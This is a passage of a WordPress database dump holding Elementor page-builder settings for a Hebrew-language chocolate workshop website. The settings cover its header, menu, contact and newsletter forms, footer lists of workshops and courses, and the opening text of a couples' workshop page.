:30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"55d792de\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36ec065f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"23726b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5dc24645\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(266,46,'_elementor_version','2.9.8'),(268,69,'_edit_last','1'),(269,69,'_edit_lock','1596644708:1'),(270,69,'_wp_page_template','elementor_header_footer'),(271,70,'_menu_item_type','post_type'),(272,70,'_menu_item_menu_item_parent','379'),(273,70,'_menu_item_object_id','69'),(274,70,'_menu_item_object','page'),(275,70,'_menu_item_target',''),(276,70,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(277,70,'_menu_item_xfn',''),(278,70,'_menu_item_url',''),(279,69,'_elementor_edit_mode','builder'),(280,69,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f07c61c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cc68838\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3f757732\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description\":\"\",\"button_text\":\"\",\"background_color\":\"#833ca3\",\"_id\":\"c001fa3\",\"background_image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/choclate-addicted.jpg\",\"id\":183},\"background_size\":\"cover\",\"background_ken_burns\":\"\",\"zoom_direction\":\"in\",\"background_overlay\":\"yes\",\"background_overlay_color\":\"rgba(0,0,0,0.5)\",\"background_overlay_blend_mode\":\"\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"link_click\":\"slide\",\"custom_style\":\"\",\"horizontal_position\":\"\",\"vertical_position\":\"\",\"text_align\":\"\",\"content_color\":\"\",\"repeater_text_shadow_text_shadow_type\":\"\",\"repeater_text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"}}],\"slides_height\":{\"unit\":\"px\",\"size\":355,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"133c8bf0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"29b4987e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2337bbe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #000000;\\\">\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d6\\u05d5\\u05d2\\u05d9 \\u05de\\u05e9\\u05de\\u05d7 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d1\\u05dc \\u05e0\\u05d2\\u05de\\u05e8\\u05d5 \\u05dc\\u05db\\u05dd \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea? \\u05e0\\u05de\\u05d0\\u05e1 \\u05dc\\u05db\\u05dd \\u05dc\\u05dc\\u05db\\u05ea \\u05e9\\u05d5\\u05d1 \\u05dc\\u05de\\u05e1\\u05e2\\u05d3\\u05d4, \\u05e9\\u05d5\\u05d1 \\u05dc\\u05e8\\u05d0\\u05d5\\u05ea \\u05e1\\u05e8\\u05d8 \\u05d1\\u05e7\\u05d5\\u05dc\\u05e0\\u05d5\\u05e2, \\u05d0\\u05d5 \\u05e9\\u05d5\\u05d1 \\u05dc\\u05d1\\u05e9\\u05dc \\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05e2\\u05e8\\u05d1 \\u05d0\\u05d9\\u05e0\\u05d8\\u05d9\\u05de\\u05d9\\u05ea? \\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05de\\u05d0\\u05d5\\u05e8\\u05e2? \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05d0\\u05d9\\u05d6\\u05d4 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05ea\\u05dd \\u05de\\u05ea\\u05db\\u05e0\\u05e0\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 - \\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05e4\\u05d4<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d6\\u05d4 \\u05dc\\u05d0 \\u05e1\\u05d5\\u05d3 \\u05e9\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05e4\\u05e0\\u05e7 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05de\\u05d9\\u05d3\\u05d9 \\u05e4\\u05e2\\u05dd, \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05d7\\u05d8\\u05d5\\u05e3 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d9\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05d3\\u05d9 \\u05dc\\u05e1\\u05d2\\u05d5\\u05e8 \\u05e6\\u05d5\\u05e8\\u05da \\u05d1\\u05de\\u05ea\\u05d5\\u05e7, \\u05d5\\u05d2\\u05dd \\u05dc\\u05e4\\u05e2\\u05de\\u05d9\\u05dd \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05db\\u05dc \\u05e1\\u05d5\\u05d2\\u05d9\\u05d5, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e9\\u05e4\\u05e8 \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7. \\u05de\\u05d9 \\u05e9\\u05de\\u05ea\\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05e7\\u05e6\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d4 \\u05d2\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05d9\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea <span style=\\\"text-decoration: underline;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\">\\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05ea<\\/a><\\/strong><\\/span>, 